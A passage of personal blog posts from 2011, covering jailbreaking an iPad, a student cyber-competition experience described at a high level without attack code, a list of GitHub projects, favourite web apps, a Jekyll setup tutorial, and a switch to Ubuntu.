Doing any task that may require access to a normal file system, such as cloning a repository from github or editing a document anywhere, is impossible on the device. I love playing games on it, though, but it seems like a really costly device to play games and read books on. Get the Fire at less than half the price, and root it to install cyanogen mod (which will soon be available for the Fire).</p> <p>Sometimes, I wonder if Indian carriers would have installed Carrier IQ on an iPad (which comes without a SIM card). I’ll find out as soon as I can root it.</p> <p>One of my friends gave a very serious comment on the iPad : “It seems as if you have rented the device from Apple, rather than bought it”. And I’ve come to realise that it’s a reflection of the sad state that the electronics manufacturing industry is in today.</p> <h3 id="a-few-more-weeks-later-">A few more weeks later :</h3> <p><strong>I jailbroke my iPad :)</strong></p> <h2 id="further-links-">Further links :</h2> <ul> <li><a href="http://gizmodo.com/5863640">Kindle fire unroots itself</a></li> <li><a href="http://www.theverge.com/2011/12/16/2642039/">Fire doesn’t allow you to visit android marketplace</a></li> <li><a href="http://lifehacker.com/5863895/">Carrier IQ controversy</a></li> <li><a href="http://www.gsmarena.com/nokia_x2_01-3610.php">Nokia dumb phone features</a> - X2-01</li> <li>How <a href="http://cydiablog.com/category/jailbreak/">I Jailbroke my iPad</a></li> </ul> My Experience with the Deloitte Cyber Collegiate Threat Competition (2011) 2011-11-20T00:00:00+00:00 https://captnemo.in/blog/2011/11/20/cctc-blog <p>I recently was part of a team at IIT-Roorkee that won the Deloitte Cyber Collegiate Threat Competition. It was a competition modeled after the Deloitte-sponsored CCDC in the US. The event will be organized in the subsequent years as well, and hence this blog post will summarize my experience so as to help any future participants. 
Moreover, the organizing team has guaranteed us that the competition will be altered significantly in the coming years. This was the first year that this event was organized, after all.</p> <p>I’ll go into the contest round by round, so beginning with Round 1.</p> <h1 id="round-1">Round 1</h1> <p>Deloitte came to our campus, with little promotion about the event. A presentation was given on the current scenario of Cyber Threat, particularly with respect to India. Free swag was awarded to people who asked some good questions, or answered some as well. After the presentation, a quiz was given out, consisting mainly of questions about Web Application Security. A few of the questions asked us to write down code to circumvent a particular issue (like SQL Injection). But it was mostly about stuff that every security conscious Web Developer would know about.</p> <p>After the quiz, they selected the top 9 candidates, and asked us to form teams. Make sure that you attend the quiz with your friends, as we definitely had an edge by knowing everyone in our team before the event. The number of teams varied from campus to campus. But if you perform decently enough, you will be selected.</p> <h1 id="round-2">Round 2</h1> <p>Each of the teams was given a VM Image, and we were asked to hack into it. We were not allowed to exploit vulnerabilities in the guest OS, or things like VMWare, or try to boot into the image with another OS, but other than that everything went.</p> <p>The VM had a library application, with several vulnerabilities. A challenge sheet was mailed to us, and we were expected to finish as many challenges as we could. Any further vulnerabilities not mentioned in the challenge could also be mentioned, but they were only to be used in the case of a tie with another team.</p> <p>The time duration for Round 2 was 15 days and we were supposed to submit our reports by then. We were able to complete most of the challenges after we found a blind SQL injection vulnerability. 
Further, we were able to get a copy of the obfuscated PHP code, which we converted to simpler versions easily enough. We had no way to make use of the code, but it did help us in identifying possible files and entry routes for vulnerabilities.</p> <p>To get a good score in round 2, try to attack every point in the application. In our case, some of them were too stupid to be used in a real case scenario. For instance, we had password hashes appearing in images. Pore through the JavaScript code, and search like hell. Stuff like w3af might help you, but since it’s a limited application only, it is often easier to just track the application flow. We did try kernel-level exploits, but the VM was fully patched and up to date.</p> <h1 id="round-3">Round 3</h1> <p>Round 3 was organized at Hyderabad and was a head-on, hack-everything contest. We were handed 3 virtual machines, with lots of vulnerable services. We had to keep those services running, which were periodically pinged by a scorebot. Scores were awarded in three categories : attack, defense, and flags.</p> <p>Attack points were earned upon getting a shell on any of the other team’s servers.</p> <p>Flag points were awarded on the basis of getting access to secrets stored inside the other team’s servers.</p> <p>Defense points were earned on the basis of status of your own service.</p> <p>The network architecture was 3-tiered. A single central router routed requests to a team’s router, which was then connected to an individual team switch. A switch was connected to the host VM, and the attack machines. Two different subnets were created for attack and defense in each team’s router. All uVMs were present in the attack subnets.</p> <h2 id="day-1">Day 1</h2> <p>Day 1 consisted mostly of us learning about the network and trying to gain access into the other systems. All the services were highly vulnerable, and as a result, we had to patch that vulnerability in our own servers before we attacked anyone with it. 
DoS attacks started late in the day, but were ever present.</p> <p>The VMs handed to us included a Windows Server 2003, a Debian, and an Ubuntu. Only open source/freeware tools were allowed, and we used lots of stuff including :</p> <ul> <li>Backtrack for almost everything since attack laptops given to us had Windows installed</li> <li>LOIC for DoS attacks</li> <li>Wireshark for packet analysis.</li> <li>Snort for intrusion detection.</li> <li>Nmap for scanning services</li> <li>Metasploit for trying out exploits</li> <li>Cain and Abel for miscellaneous stuff</li> </ul> <h2 id="day-2">Day 2</h2> <p>Day 2 involved lots of pwning, and a surprise twist. All VMs for day 1 had been reset to their current state, and we had to patch them all over again in the first fifteen minutes of the session. Other than that, the increase in traffic was exponential. All our machines were scanned to hell. DoS attacks became normal, and the epic moment of the day was during the last session when we had our router pwned.</p> <p>Pics from the Event are at <a href="https://www.facebook.com/media/set/?set=a.2204003219759.2107008.1237711792">Facebook</a>.</p> <h1 id="conclusion">Conclusion</h1> <p>Kudos to the Deloitte Team for organizing such a brilliant contest. We had lots of fun. They have assured us that next year it will be even bigger and better. And that the format will be entirely different next year, so this blog post might not be as helpful as you may have thought.</p> Github +1 URLs 2011-10-17T00:00:00+00:00 https://captnemo.in/blog/2011/10/17/github-projects-to-follow <p>I was working on the Google +1 Listing API (undocumented). So here’s a list of my current +1 urls on github.com. Most of the projects pertain to web-designing. 
I’ll update this list automatically every week or so, provided I remember to/set a cron job.</p> <table> <tbody id="urls"> <tr> <td><a href="https://github.com/jayferd/color.js" title="https://github.com/jayferd/color.js">jayferd/color.js</a> </td><td><p>color.js - The missing color library</p> </td> </tr> <tr> <td><a href="https://github.com/typicaljoe/taffydb" title="https://github.com/typicaljoe/taffydb">typicaljoe/taffydb</a> </td><td><p>taffydb - TaffyDB - an open source JavaScript Database for your browser</p> </td> </tr> <tr> <td><a href="https://github.com/antirez/lamernews" title="https://github.com/antirez/lamernews">antirez/lamernews</a> </td><td><p>lamernews - Lamer News -- an HN style social news site written in Ruby/Sinatra/Redis/JQuery</p> </td> </tr> <tr> <td><a href="https://github.com/felixge/node-mysql/" title="https://github.com/felixge/node-mysql/">felixge/node-mysql</a> </td><td><p>node-mysql - A pure node.js JavaScript Client implementing the MySql protocol.</p> </td> </tr> <tr> <td><a href="https://github.com/daneden/animate.css" title="https://github.com/daneden/animate.css">daneden/animate.css</a> </td><td><p>animate.css - A big ol' goody bag filled with CSS animations for WebKit, Firefox and beyond.</p> </td> </tr> <tr> <td><a href="https://github.com/javve/list" title="https://github.com/javve/list">javve/list</a> </td><td><p>Do you want a 7 KB cross-browser native JavaScript that makes your plain HTML lists super flexible, searchable, sortable and filterable? 
Yea</p> </td> </tr> <tr> <td><a href="https://github.com/azer/jekyll-social-activities" title="https://github.com/azer/jekyll-social-activities">azer/jekyll-social-activities</a> </td><td><p>jekyll-social-activities - a jekyll project template to list social network activities</p> </td> </tr> <tr> <td><a href="https://github.com/e1ven/Robohash" title="https://github.com/e1ven/Robohash">e1ven/Robohash</a> </td><td><p>Robohash - RoboHash.org</p> </td> </tr> <tr> <td><a href="https://github.com/donpark/node-robohash" title="https://github.com/donpark/node-robohash">donpark/node-robohash</a> </td><td><p>node-robohash - node.js implementation of Robohash. It's neither complete nor render general SVG.</p> </td> </tr> <tr> <td><a href="https://github.com/lg/marshmallow" title="https://github.com/lg/marshmallow">lg/marshmallow</a> </td><td><p>marshmallow - An open source Campfire server</p> </td> </tr> <tr> <td><a href="https://github.com/tmcw/big" title="https://github.com/tmcw/big">tmcw/big</a> </td><td><p>big - presentations for busy messy hackers</p> </td> </tr> <tr> <td><a href="https://github.com/blog/964-all-of-the-hooks" title="https://github.com/blog/964-all-of-the-hooks">All of the Hooks</a> </td><td><p>Service Hooks are available for more events (issues, pull requests, forks, etc). 
Update them through the API!</p> </td> </tr> <tr> <td><a href="https://github.com/chromakode/karmabot" title="https://github.com/chromakode/karmabot">chromakode/karmabot</a> </td><td><p>karmabot - A highly extensible IRC karma+information bot written in Python.</p> </td> </tr> <tr> <td><a href="https://github.com/moserware/PHPSkills" title="https://github.com/moserware/PHPSkills">moserware/PHPSkills</a> </td><td><p>PHPSkills - An implementation of the TrueSkill algorithm in PHP</p> </td> </tr> <tr> <td><a href="https://github.com/nodejitsu/docs" title="https://github.com/nodejitsu/docs">nodejitsu/docs</a> </td><td><p>docs - Community powered rocket fuel for node.js</p> </td> </tr> <tr> <td><a href="http://fgnass.github.com/spin.js/" title="http://fgnass.github.com/spin.js/">spin.js</a> </td><td><p>An animated CSS activity indicator with VML fallback.</p> </td> </tr> <tr> <td><a href="https://blackberry.github.io/Alice/demos/index.html" title="https://blackberry.github.io/Alice/demos/index.html">Alice.js Demos</a> </td><td><p>Alice.js Demos. 
Alice.js (A Lightweight Independent CSS Engine) is a micro JavaScript library focused on using hardware-accelerated capabili</p> </td> </tr> <tr> <td><a href="https://github.com/tcorral/Design-Patterns-in-Javascript" title="https://github.com/tcorral/Design-Patterns-in-Javascript">tcorral/Design-Patterns-in-Javascript</a> </td><td><p>Design-Patterns-in-Javascript - Based in examples on Head First Design Patterns</p> </td> </tr> <tr> <td><a href="https://github.com/atduskgreg/srender" title="https://github.com/atduskgreg/srender">atduskgreg/srender</a> </td><td><p>srender - John Resig's Simple Javascript Templating turned into a jQuery Plugin</p> </td> </tr> <tr> <td><a href="https://github.com/mrdavidlaing/functional-javascript" title="https://github.com/mrdavidlaing/functional-javascript">mrdavidlaing/functional-javascript</a> </td><td><p>functional-javascript - A fun set of koans to teach you functional programming techniques in Javascript</p> </td> </tr> <tr> <td><a href="https://github.com/mrdavidlaing/javascript-koans" title="https://github.com/mrdavidlaing/javascript-koans">mrdavidlaing/javascript-koans</a> </td><td><p>javascript-koans - Koans to learn Javascript</p> </td> </tr> <tr> <td><a href="https://github.com/robrighter/current" title="https://github.com/robrighter/current">robrighter/current</a> </td><td><p>current - Node.js app for visualizing http requests on a lan</p> </td> </tr> <tr> <td><a href="https://github.com/bcoe/endtable" title="https://github.com/bcoe/endtable">bcoe/endtable</a> </td><td><p>endtable - A ridiculously simple Object Mapper for Node running on top of CouchDB.</p> </td> </tr> <tr> <td><a href="https://github.com/sproutcore/sproutcore" title="https://github.com/sproutcore/sproutcore">sproutcore/sproutcore</a> </td><td><p>sproutcore - JavaScript Application Framework - JS library only</p> </td> </tr> <tr> <td><a href="https://github.com/tpope" title="https://github.com/tpope">tpope's Profile</a> </td><td><p>tpope (Tim Pope). 
You're not logged in! Login; Pricing &amp; Signup. Name: Tim Pope. Website/Blog: http://tpo.pe/. Company: Waiting on t</p> </td> </tr> <tr> <td><a href="https://github.com/tpope/vim-fugitive" title="https://github.com/tpope/vim-fugitive">tpope/vim-fugitive</a> </td><td><p>vim-fugitive - fugitive.vim: a Git wrapper so awesome, it should be illegal</p> </td> </tr> <tr> <td><a href="https://github.com/github/gitignore" title="https://github.com/github/gitignore">github/gitignore</a> </td><td><p>A collection of useful .gitignore templates</p> </td> </tr> <tr> <td><a href="http://harvesthq.github.com/chosen/" title="http://harvesthq.github.com/chosen/">Chosen - a JavaScript plugin for jQuery and Prototype - makes select boxes better</a> </td><td><p>Standard Select.</p> </td> </tr> <tr> <td><a href="https://github.com/harvesthq/chosen" title="https://github.com/harvesthq/chosen">harvesthq/chosen</a> </td><td><p>chosen - Chosen is a library for making long, unwieldy select boxes more friendly.</p> </td> </tr> <tr> <td><a href="https://github.com/rthauby/Paige" title="https://github.com/rthauby/Paige">rthauby/Paige</a> </td><td><p>Paige - Super simple project page generation</p> </td> </tr> <tr> <td><a href="http://jashkenas.github.com/docco/" title="http://jashkenas.github.com/docco/">docco.coffee</a> </td><td><p>Docco is a quick-and-dirty, hundred-line-long, literate-programming-style documentation generator. 
It produces HTML that displays your comme</p> </td> </tr> <tr> <td><a href="https://github.com/LeaVerou/prefixfree" title="https://github.com/LeaVerou/prefixfree">LeaVerou/prefixfree</a> </td><td><p>prefixfree - Break free from prefix hell!</p> </td> </tr> <tr> <td><a href="https://github.com/twitter/scala_school" title="https://github.com/twitter/scala_school">twitter/scala_school</a> </td><td><p>scala_school - Lessons in the Fundamentals of Scala</p> </td> </tr> <tr> <td><a href="https://github.com/arcturo/library" title="https://github.com/arcturo/library">arcturo/library</a> </td><td><p>A library of free eBooks we're working on</p> </td> </tr> <tr> <td><a href="https://github.com/tcr/selection.js" title="https://github.com/tcr/selection.js"> tcr/selection.js</a> </td><td><p>selection.js - A tiny JavaScript DOM selection library for modern browsers and IE5-8.</p> </td> </tr> <tr> <td><a href="http://dodgeball.github.com/" title="http://dodgeball.github.com/">First Annual Octocat Dodgeball Invitational</a> </td><td><p>Why? We were brainstorming in the office and decided we should throw balls at our enemies. But why stop at destroying our enemies with foam </p> </td> </tr> <tr> <td><a href="https://github.com/coreh-deprecated/nide" title="https://github.com/coreh-deprecated/nide">nide - Beautiful IDE for Node.JS</a> </td><td><p>nide. Beautiful IDE for Node.JS. nide is a web-based IDE for Node.js, designed with simplicity and ease-of-use in mind. The current version </p> </td> </tr> <tr> <td><a href="https://github.com/mikeal/request" title="https://github.com/mikeal/request">mikeal/request</a> </td><td><p>Simplified HTTP request client.</p> </td> </tr> <tr> <td><a href="https://github.com/unconed/TermKit" title="https://github.com/unconed/TermKit">unconed/TermKit</a> </td><td><p>TermKit - Experimental Terminal platform built on WebKit + node.js. 
Currently only for Mac and Windows, though the prototype works 90% in an</p> </td> </tr> <tr> <td><a href="http://usersinhell.com/dropbox-github-pricing/" title="http://usersinhell.com/dropbox-github-pricing/">If Dropbox Used GitHub’s Pricing Plan</a> </td><td><p>If Dropbox Used GitHub's Pricing Plan. What if Dropbox used GitHub's pricing model? Folders? Yes, folders. I have a lot of folders. </p> </td> </tr> </tbody> </table> Must Use Web Applications 2011-10-15T00:00:00+00:00 https://captnemo.in/blog/2011/10/15/awesome-webapps <p>Here are a few of the applications that I would heavily recommend.</p> <h2 id="workflowy"><a href="http://workflowy.com">Workflowy</a></h2> <p>Here’s how Workflow describes itself.</p> <blockquote> <p>WorkFlowy is a simple, but powerful way to manage all the information in your life.</p> </blockquote> <p>Here’s their introductory video:</p> <iframe width="500" height="300" src="https://www.youtube.com/embed/CSmbnaPZVHE" frameborder="1" allowfullscreen=""></iframe> <p>If that does not hook you, I don’t know what will.</p> <h2 id="clipboard-">Clipboard <img src="https://img.shields.io/badge/status-dead-red.svg?style=flat-square" alt="" /></h2> <p>Clipboard is a content archiver tool that makes it quick, snappy, easy, and cool. It has got tons of features and is still in private beta. However, since Michael Arrington blogged about it, it has begun accepting larger number of invites. I’ve only started to use it, but it has been quite awesome till now.</p> <p>My favorite feature is <em>embed</em>. Everything I’ve embedded on this page is via clipboard, as a demo. You can clip tweets, pics, videos and what not and embed it on your blog easily.</p> <h2 id="gett-"><a href="http://ge.tt/">Ge.tt</a> <img src="https://img.shields.io/badge/status-mostly-dead-orange.svg?style=flat-square" alt="" /></h2> <p>Ge.tt is one of the many file sharing sites that seem to have cropped up in Web 2.0. Its USP is its simplicty, however don’t be fooled by it. 
It has got lots of features as well:</p> <p><img src="/img/gett.png" alt="Gett Screenshot" /></p> <ul> <li>Share URLs while your stuff is uploading</li> <li>Share without even logging in</li> <li>Drag and drop upload</li> <li>Versioning for file Uploads</li> <li>Share multiple files under a single upload</li> <li>Limited Analytics (See number of Downloads)</li> </ul> <p>So yes, its not as powerful as many others, but has got quite enough features to keep me busy.</p> <h2 id="minus-">Minus] <img src="https://img.shields.io/badge/status-dead-red.svg?style=flat-square" alt="" /></h2> <p>Minus is a simple image sharing service. It was amongst the first to offer Drag-And-Drop upload back before it was cool. Right now, it is trying to become the next flickr, allowing people to subscribe to each other. If you are someone who posts cool pics regularly, check this out.</p> <p><img src="/img/minus.png" alt="Minus Home Page" /></p> <p>My primary browser is Chromium, and here are some Chrome Applications that I use regularly:</p> <h2 id="offline-gmail-">Offline GMail <img src="https://img.shields.io/badge/status-dead-red.svg?style=flat-square" alt="" /></h2> <p>Was a Chrome extension that used Google Gears for letting you use GMail completely offline.</p> <p><img src="https://lh4.googleusercontent.com/G7YSss4-ULNnV0NPYE3UDszmIAdeV8l3FWAqK0qy_s7LmCTiqG5JeRkl6pEXed2fCwhtoZEU=s400-h275-e365" alt="Offline GMail Screenshot" /></p> <h3 id="pros">Pros:</h3> <ul> <li>Looks cool</li> <li>Allows multiple accounts</li> <li>Drafs facility</li> <li>Labels</li> </ul> <h3 id="cons">Cons</h3> <ul> <li>Not all the functionality of Online GMail</li> </ul> <h2 id="collaborative-editors">Collaborative Editors</h2> <p>I like collaborative editing, working together with people in real-time. Unfortunately, the <a href="http://wave.google.com">biggest entrant</a> fizzed out. 
However, there are still quite a lot of competitors left in the field.</p> <h3 id="google-docs"><a href="https://docs.google.com">Google Docs</a></h3> <p>I tend to avoid Google Docs usually, as it is too much of a bloat for me. The integration with Google Chat is good, but sometimes all you need is a plain text editor. There is also an <a href="https://chrome.google.com/webstore/detail/apdfllckaahabafndbhieahigkjlhalf?hc=search&amp;hcp=main">Offline Google Docs</a> application, although it does not allow one to edit documents. Also no presentations.</p> <h3 id="etherpad"><a href="http://etherpad.com">Etherpad</a></h3> <p>Etherpad is quite good, as a plain text collaborative editor. I tend it to use it frequently, and it has some excellent features. It makes a thousand revisions of each of my posts, and allows me to play through them, and see who made wat change in real-time. All this, for free. Plus you get chat, and basic formatting (bold, italics, underline).</p> <p>The previously mentioned <a href="http://workflowy.com">workflowy</a> keeps your lists in sync over time, so it is collaborative, though not in real time.</p> <p>Also, mention goes out to <a href="http://pastehtml.com">pastehtml</a>, which does an excellent job. Its neither collaborative nor has sharing, but it had me hooked at <em>editable markdown</em>. 
You can type in markdown, publish in html, and come back and edit your documents, as per your heart’s wish.</p> <h2 id="grooveshark-">Grooveshark <a href="https://www.cinchsolution.com/what-happened-to-grooveshark-com/"><img src="https://img.shields.io/badge/status-dead-red.svg?style=flat-square" alt="" /></a></h2> <p>I rarely listen to music online, but when I do, it’s either on YouTube or Grooveshark.</p> <p><img src="/img/grooveshark.jpg" alt="Grooveshark Screenshot" /></p> <p>Looking back at this document, it seems that there are not many web-apps that I use.</p> <p>Some other applications that I regularly use, in no particular order:</p> <ul> <li>FreedCamp - A free alternative to <a href="http://basecamphq.com">Basecamp</a> <img src="https://img.shields.io/badge/status-dead-red.svg?style=flat-square" alt="" /></li> <li><a href="http://www.issueburner.com/">IssueBurner</a> - Simple Issue Tracking via Email</li> <li>Postary - A simple blogging platform. “Write.Share.” <img src="https://img.shields.io/badge/status-dead-red.svg?style=flat-square" alt="" /></li> <li><a href="http://lastpass.com">LastPass</a> - Password Manager</li> </ul> <p>I’ll probably add some Chrome Extensions later as well.</p> Blogging with Jekyll 2011-09-19T00:00:00+00:00 https://captnemo.in/blog/2011/09/19/jekyll <p>For the past few years, there has been a revolution in the blogging scene. People have moved towards better hosting providers and better blogging tools, with automated and delayed blogging becoming the norm. Posts are written months in advance, and proof-read dozens of times, before making it to the general public. <a href="http://wordpress.com">Wordpress</a>, <a href="http://blogspot.com">Blogspot</a>, <a href="http://tumblr.com">Tumblr</a>, Posterous, and Textpattern are pretty much everything that most of the bloggers use. However, there have been some silent niche entries in this market.
Static Site Generators.</p> <h2 id="static-site-generators">Static Site Generators</h2> <p>Static Site Generators are tools which you use to generate a static version of your site. Instead of using a dynamic scripting language (such as PHP), your tool takes in your markup &amp; combines it with your blog posts to generate an HTML-only version of your site. This version is then uploaded (e.g., via FTP) and is then visible as your blog. Most such tools are written in languages such as <code class="language-plaintext highlighter-rouge">ruby</code>, <code class="language-plaintext highlighter-rouge">python</code>, <code class="language-plaintext highlighter-rouge">node.js</code>, and <code class="language-plaintext highlighter-rouge">erlang</code>. The most commonly known are Jekyll, Hyde, nanoc, and webby. An excellent list is available <a href="https://staticsitegenerators.net/">here</a>.</p> <h2 id="benifits-of-using-static-site-generators">Benefits of using Static Site Generators</h2> <h3 id="markup">Markup</h3> <p>For me, the most important part of using Jekyll is that it allows me to use <code class="language-plaintext highlighter-rouge">markdown</code> as my writing syntax. Markdown is a markup language that is compiled to HTML. It is supposed to be a highly readable version of HTML. For instance, it uses backticks (`) to write code.</p> <p>`this` becomes <code class="language-plaintext highlighter-rouge">this</code></p> <p>Also, you can use * to emphasize text (strong or emphasis). Link creation is not the horrible &lt;a href=&gt; that you remember, but the sleek looking [Link text](Link URL). Similarly it offers lots of other features. You can even specify alternative markup languages, such as textile, in the jekyll configuration.</p> <h3 id="ease-of-blogging">Ease Of Blogging</h3> <p>You can write blog entries very easily.
I’ve added markdown syntax bindings to <code class="language-plaintext highlighter-rouge">vim</code>, my favorite editor, and geany has a markdown plugin as well. I am of the opinion that you should write text entries in a text-editor, not a textarea in a browser window. I used Windows Live Writer for quite some time and still believe that it is far ahead of anything else in the market. But the wpost format that it uses is proprietary, and as such stopped me from importing blog posts anywhere.</p> <h3 id="revision-control">Revision Control</h3> <p>Revision Control, such as <code class="language-plaintext highlighter-rouge">git</code>, works best with text-files. Since your blog entries are now just plain text files, you can easily store them under version control, easily reverting botched commits, making branches, and merging errors. And in case you do not know it yet, <code class="language-plaintext highlighter-rouge">git</code> is awesome!</p> <h3 id="layout-tools">Layout Tools</h3> <p>Jekyll allows you to define your layout using Liquid Templating. {{content}} translates to the variable content. Similarly you can iterate over blog posts, by using Liquid tags for <code class="language-plaintext highlighter-rouge">foreach</code>. The best part is that this is all done before publishing your website, meaning that the final result is always just pure html. You can easily create static portions of your site (such as headers, footers, sidebars).</p> <h2 id="getting-started-with-jekyll">Getting Started With Jekyll</h2> <p>I’ll start with jekyll, since it is the most used one out there, and runs on github. It even powers this very blog. First, you must install jekyll. On an Ubuntu machine, <code class="language-plaintext highlighter-rouge">sudo apt-get install ruby rubygems &amp;&amp; gem install jekyll</code> should work.
If you are working on development using Ruby, I’d recommend you use <code class="language-plaintext highlighter-rouge">rvm</code>, instead of plain vanilla distro ruby installs. For windows folks, install Ruby, and the Devkit using RubyInstaller.org. After that run <code class="language-plaintext highlighter-rouge">gem install jekyll</code>.</p> <p>Instead of preparing a site from scratch, we will instead be forking an existing site running on jekyll, and using it to model our own. This is partly to shield this tutorial from html/css/js which is irrelevant in this case. In this particular case, I will be using <a href="http://captnemo.in">my very own website</a>. <a href="http://github.com/captn3m0/captn3m0.github.com">Download the source code</a> for my website from github and extract it somewhere. Next, you will have to delete all the content inside the <code class="language-plaintext highlighter-rouge">_posts</code>, projects, <code class="language-plaintext highlighter-rouge">_drafts</code>, contact, &amp; data directories as I do not give permission to you to use those in your site.</p> <p>Next, create a file called <code class="language-plaintext highlighter-rouge">_posts/2011-month-date.md</code> with the following format:</p> <pre> <code class="prettyprint">
---
title: Title Of Post
layout: post
---
The blog entry follows here in markdown.
You can use *italic*, **bold**, [Link](http://google.com), #header1, ##header2 etc.
For more markdown details, visit its official page at http://daringfireball.net/projects/markdown/syntax#autolink
</code> </pre> <p>Now, open up the <code class="language-plaintext highlighter-rouge">_layouts/</code> directory and edit default.html. You’d need basic html skills to replace my photo with your own, and change links to various places. After you are done, just <code class="language-plaintext highlighter-rouge">cd</code> into the root directory of the site, and run <code class="language-plaintext highlighter-rouge">jekyll</code>.
Some output should confirm that the server ran successfully. Open up <code class="language-plaintext highlighter-rouge">http://localhost:4000</code> in your browser, and you will see your web-site running.</p> <p>Now for the hosting part. All of your current site is hosted in the <code class="language-plaintext highlighter-rouge">_site</code> folder, so you can upload it anytime you want. Or, if you want, you can use github as your hosting provider. Just follow the instructions on <a href="http://pages.github.com">pages.github.com</a> and you should be up and running in no time.</p> Six Months of Ubuntu 2011-09-13T00:00:00+00:00 https://captnemo.in/blog/2011/09/13/6-months-of-ubuntu <p>I installed Ubuntu as my primary OS back sometime in February. Not that I’d not tried it earlier. In fact, I’d used a copy of Ubuntu 3 back in the day. But this time around, Windows (from my dual boot) just gave up and died. The partition with Windows got heavily corrupted, lost lots of data, and ultimately I had to format it. And Ubuntu dragged through all that. And here I’m today, a veteran of 3 Ubuntu versions, starting with 10.10, and right now on the 11.10 beta.</p> <p>What have I learned? That it’s better than Windows, for one. But several other things as well. I’m writing this post from the general linux-distro scene, and not just Ubuntu in specific. For the period before Feb, I’d been using Linux Mint as my primary OS for quite some time. But Ubuntu Natty Alpha brought all that Unity love (which I doted on once), and I had to move to 11.04.</p> <h2 id="reasons-to-switch-to-linux">Reasons to switch to Linux</h2> <ol> <li>It’s free!</li> <li>It’s free! No more paying up for Windows. People who had Windows ship with their computers would be delighted to know that there is something called a Windows Refund, which allows you to be compensated for the cost of Windows, if you decide not to use it.</li> <li>Better file system.
If you’ve ever lost yourself in the mirth of files in “Program Files”, “AppData”, “Application Data”, “system32” and the like, you’d be delighted to know that there is a very well balanced binary management system in Linux. All binaries are in PATH, unlike Windows, where some software does that, and most doesn’t. So you can actually run <code class="language-plaintext highlighter-rouge">php</code>, <code class="language-plaintext highlighter-rouge">git</code>, <code class="language-plaintext highlighter-rouge">ruby</code> from any damn place that you want. People who have tried to compile Java programs using <code class="language-plaintext highlighter-rouge">javac</code> on Windows might remember updating PATH in Windows. No more of that in Linux.</li> <li>Free software! The majority of good software on Windows is paid (and even more with Mac). But in the Linux world, (almost) everything is free. What is paid for then? Some games, high level commercial software and the like. But most of the stuff is free.</li> <li><strong>Package Management</strong> Apparently Windows 8 will have some sort of app-store with it. Which is a long time coming in Windows. But guess what, almost all Linux distros have some flavor of package manager built in. Debian (and Ubuntu) has <code class="language-plaintext highlighter-rouge">apt-get</code>, Arch has <code class="language-plaintext highlighter-rouge">pacman</code>, Fedora has <code class="language-plaintext highlighter-rouge">yum</code>. And installing software is as easy as it could be. Need mysql? Just type <code class="language-plaintext highlighter-rouge">sudo apt-get install mysql-server</code>. Done. Boom. Just like that.</li> <li><strong>Customization Level</strong> Even though I don’t like the messing up of Gnome by Ubuntu, there are tons of alternatives available. I’m right now using Gnome-Shell, and have plans to move to <code class="language-plaintext highlighter-rouge">xmonad</code>, which is another Window Manager.
Almost every feature on the Linux desktop can be customized.</li> <li><strong>Terminal</strong> I’d always planned several <code class="language-plaintext highlighter-rouge">learn bash scripting</code> kind of to-dos but never got to it until I started using Linux. Even if you don’t script, the actual power of your machine is opened by the terminal. Hacking away in <code class="language-plaintext highlighter-rouge">vim</code>, and browsing sites using <code class="language-plaintext highlighter-rouge">elinks</code>, and ordering Pizzas in Command Line is as geeky as it gets. Gnome is designed in such a way to allow a normal user to use his computer fully without touching the terminal, but if you use it, it gets better &amp; better.</li> <li><strong>Applications</strong> There was a time I used to be a Windows fanatic, using WMP, Zune, Everything and what not. But now, I’ve got a bigger arsenal of software. Ever used <em>Audacious</em>? That’s my default music player, and it’s awesome.</li> <li><strong>Software Development</strong> You use Windows to develop stuff for Windows. I’m nowhere near to writing applications in C#. I’ll probably be hacking away scripts in ruby, node, python, bash, and building stuff using xul, gtk, webgtk, and qt. All my web applications are ultimately deployed on Linux machines, so it makes sense to write them on Linux. And only Linux has the ease of language package managers, like rubygems, npm, and pip.</li> <li><strong>Open Source</strong> I haven’t yet checked out the Linux Kernel source code, but I’m thinking of getting my hands dirty real soon. Ever since I’ve joined github, I’ve been introduced to several awesome coders, projects, and organizations. And guess what? It’s all open source!
Meaning I actually spend less time writing parsers for xml, and more time working on applications.</li> </ol> <h2 id="what-ive-learned">What I’ve Learned</h2> <ol> <li><strong>Be utterly fearless</strong> Back when I was in Windows, a simple partition deletion used to scare me to death. Now? I’m ready for anything. If you, like me, go play with the alpha of all your favorite stuff, then things will break. And it will be fun to solve all that stuff. You will learn a thousand new things in the process, gain lots of rep on askubuntu, and become a Ubuntu Jedi Master. OK, maybe not the last bit, but <em>you shall become utterly fearless</em> of all danger. I had to use my computer without network accessibility for three days. And it didn’t even give me a GUI. So I just drudged along for 3 days straight on the console. :)</li> <li><strong>Community</strong> Sometimes, I feel people do not get my helpful comments, and offerings of help on Facebook. It’s not their fault. They’ve never been introduced to a proper online, helpful community before. The Linux community is helpful, worldwide, readily available, and has probably handled the problem that you are facing now.</li> <li><strong>Server Administration</strong> I’m still lacking on the cloud front, as I don’t have servers powerful enough to host virtual machines. But otherwise, I’ve handled lots of stuff. <code class="language-plaintext highlighter-rouge">ssh</code> is my thing, and I use <code class="language-plaintext highlighter-rouge">git</code> to deploy applications like a pro. I’ve moved on from <code class="language-plaintext highlighter-rouge">apache</code> to <code class="language-plaintext highlighter-rouge">nginx</code> to <code class="language-plaintext highlighter-rouge">cherokee</code> and what not.</li> <li><strong>Take Backups</strong> Remember all those “Take Backups before installing Windows/Ubuntu” things that pop up while installing your OS? I never paid attention to them, until recently.
Now, I’ve got backups scheduled on <code class="language-plaintext highlighter-rouge">Dropbox</code>, <code class="language-plaintext highlighter-rouge">SpiderOak</code>, and a custom <code class="language-plaintext highlighter-rouge">SparkleShare</code> server. I make sure to host my code on github, or my personal git repositories and backup images to Picasa. Everyone knows hard discs are unreliable, so why not make your data redundant and take backups?</li> </ol> <p>The only counter argument would be that Windows has a much more streamlined view of things, with almost everything offering a GUI based application to manage stuff. That’s just not the Linux way. Still, I’m not one of those crazy fanatics who go around preaching Linux (maybe I am!). I feel that if you are using your computer to just open Chrome, Firefox, VLC, and Word, then anything would do. You could probably install android on your computer and do everything you are doing right now. If you are a heavy gamer, then better stay with Windows. And if you are a programmer, switch to Linux.</p> <h2 id="windows-8">Windows 8</h2> <p>I installed a developer preview copy of Windows 8 recently, and although I was really awed by its design concepts, I feel that it is still lacking in certain fronts. For instance, it seems to me that Microsoft is trying to get 8 to the tablets much more readily than on the desktops. Why? Because, there is nothing that can undermine Windows’ superior market share in Desktops for the near future. However Android &amp; iOS have a very strong presence. Ergo, Windows 8 goes to tablets.</p> <p>I installed all my favorite programs on Windows 8, but had to switch back after a few days. As a developer, it just does not offer me the same freedom, 